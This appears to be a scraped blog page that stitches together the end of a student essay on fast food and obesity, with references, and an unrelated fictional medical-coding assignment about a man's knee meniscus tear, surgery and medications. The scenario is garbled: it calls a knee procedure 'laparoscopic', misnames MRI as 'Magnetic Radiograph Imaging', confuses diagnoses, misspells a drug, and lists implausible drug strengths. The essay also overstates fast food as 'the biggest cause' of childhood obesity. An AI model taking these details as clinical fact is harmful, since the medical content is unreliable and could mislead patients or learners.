although there are many reasons for the causes of obesity ,one of the main reasons for obesity is the consumption of fast food too much. As mentioned above, there is a positive correlation between obesity and many diseases such as heart disease, type 2 diabetes and hypertension. It is cannot to be ignored that fast food is the biggest cause of obesity in children. Fast food will bring a large quantity of health problems. References: Barnett. A.H and Kumar S.(2008) 2nd Ed .Obesity and diabetes. pub. Wiley-Blackwell Oxford .UK. Ewles. L.(2005) Ed. Key topics in public health: essential briefings on prevention and health promotion. pub. Elsevier Churchill Livingstone. UK Larsson. B. (1981) The health consequences of obesity, International journal of Obesity.pub. Oxford University Press . UK. The Health of The Nation (1992) Key Area Handbook :Coronary heart disease and stroke .pub. Nation white paper. UK.

Friday, January 10, 2020

Medical Scenario

MEDICAL SCENARIO FOR PARTS 1 & 2 FINAL PROJECT Assignment Reading: 1. AMBULATORY CARE FACE SHEET Admit Date: 7/8/20XX @ 20:22 Discharge Date/Time: 7/9/20XX @ 10:10 Sex: M Age: 47 Disposition: Home Admitting Diagnosis: Possible torn meniscus of the left knee. Discharge Diagnosis: Left Knee meniscectomy. Procedures: Laparoscopic Surgery to the Left Knee. CONSULTATION Date of Consultation: 7/8/20XX This is a 47-year-old male who was in his usual state of health until today entered the Emergency Room with severe pain to his left knee and equal amount of edema within the patellar area.This occurred after the patient fell at an angle on the left knee during a game of football with friends. The patient was evaluated with L-Knee Radiograph and Magnetic Radiograph Imaging (MRI) for soft-tissue films. The L-Knee X-Ray revealed no fractures to the Femur, Patella, Tibia, or Fibula. The MRI revealed a large tear surrounding the meniscus of the left knee. The patient was treated with a left knee s plint and crutches with a prescription for Mobic 15mg daily and Tramadol/APAP 37. 5 mg every 4-6 hours for pain. The patient was referred to Orthopedics for surgical repair.He has no past history of tobacco abuse, previous fractures, or surgeries. 2. Past Medical History: Allergies: No known drug allergies. Medications: None. Surgeries: None Medical History: History of Chronic Otitis Externa Family History: Noncontributory. Review of Systems: No medical abnormalities. Physical Examination: Vital Signs: BP 130/80, P 92, T 98. 5 General: This is a well-developed and well-nourished anxious black male in mild distress. Head and neck are normocephalic and the oropharynx is clear. The left knee shows 5+ edema and patient is unable to bend at knee joint connection.The patient’s left leg is not weight bearing and the pain level continues to be a 6 to 7 on the pain scale. The patient is using crutches and wheelchair for mobility. All other musculoskeletal joints are with free range of motion. Neurologic with no focal deficits. Impression: Inpatient laparoscopic surgery for total left knee meniscectomy. Local anesthetic total block of the patellar region. 3. OPERATIVE REPORT Date of Procedure: 7/8/20XX Procedure: Laparoscopic Meniscectomy of Left Knee Preoperative Medication: Demerol 50 mg IV, Robinal 3 mg IV, Xylocaine with 1% Epinephrine Preoperative Diagnosis: . Total Left Knee Meniscus Tear. Postoperative Diagnosis: Laparoscopic Meniscectomy of Left Knee Clinical Note: This is a 47-year-old black male with a total meniscus tear of the left knee caused by a causal game of tag football. The patient felt a pop after falling on the left knee at an angle causing severe pain and edema. The patient was taken to the emergency room for x-rays of the left leg and MRI to the left patellar region. He was referred to the othropedics clinic for laparoscopic surgery to the left knee meniscus.Findings: After obtaining informed consent, he was premedicated with Demerol, Robin al, Xylocaine with 1% Epinephrine without any complications. The patients’ left knee was laparoscoped in the meniscus and the anterolateral and anteromedial parapatellar portholes. The synovium in the suprapatellar pouch showed moderate to severe inflammatory changes with villi formation and hyperemia. Similar changes were noted in the intercondylar groove. The patient tolerated the procedure well, and his post-procedure vital signs are stable. Recommendations: 1. Clear liquids for 24 hours. 2. Follow-up in the office in 2 days.